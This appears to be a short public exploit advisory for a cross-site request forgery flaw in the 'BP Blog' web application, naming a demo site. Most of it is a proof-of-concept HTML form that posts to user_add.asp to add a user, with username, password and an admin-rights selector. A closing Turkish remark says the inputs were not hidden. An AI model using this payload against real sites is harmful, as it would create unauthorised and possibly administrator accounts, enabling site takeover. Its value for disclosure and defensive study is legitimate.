< ------------------- header data start ------------------- >

#############################################################

# Application Name : BP Blog XSRF Vulnerability

# Vulnerable Type : XSRF Vuln.

# Demo : http://dev.mattjsherman.com

# Author : Muctehid // Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

<form action=user_add.asp method=POST name=form1 id=form1>
<input type=text name=fldAuthorUsername id=fldAuthorUsername value= size=32 class=validate[required,custom[noSpecialCaracters]] />
<input type=password name=fldAuthorPassword id=fldAuthorPassword value= size=32 class=validate[required] />
<input name=fldAuthorPasswordConfirm type=password id=fldAuthorPasswordConfirm size=32 class=validate[required,confirm[fldAuthorPassword]] />
<input type=text name=fldAuthorRealName id=fldAuthorRealName value= size=32 class=validate[required] />
<input type=text name=fldAuthorEmail id=fldAuthorEmail value= size=32 class=validate[required,custom[email]] />
<input type=text name=fldAuthorWebsite value= size=32 />
<select name=Approved id=Approved>
<option value=1 selected=selected>Yes</option>
<option value=0>No</option>
</select>
<select name=fldAdmin id=fldAdmin>
<option value=1>Yes</option>
<option value=0 selected=selected>No</option>
</select>
<input type=submit value=Add User />
<input type=hidden name=MM_insert value=form1 />
</form>

*inputlari gizleyip tek tek ayiklamadim arkadaslar.


< -- bug code end of -- >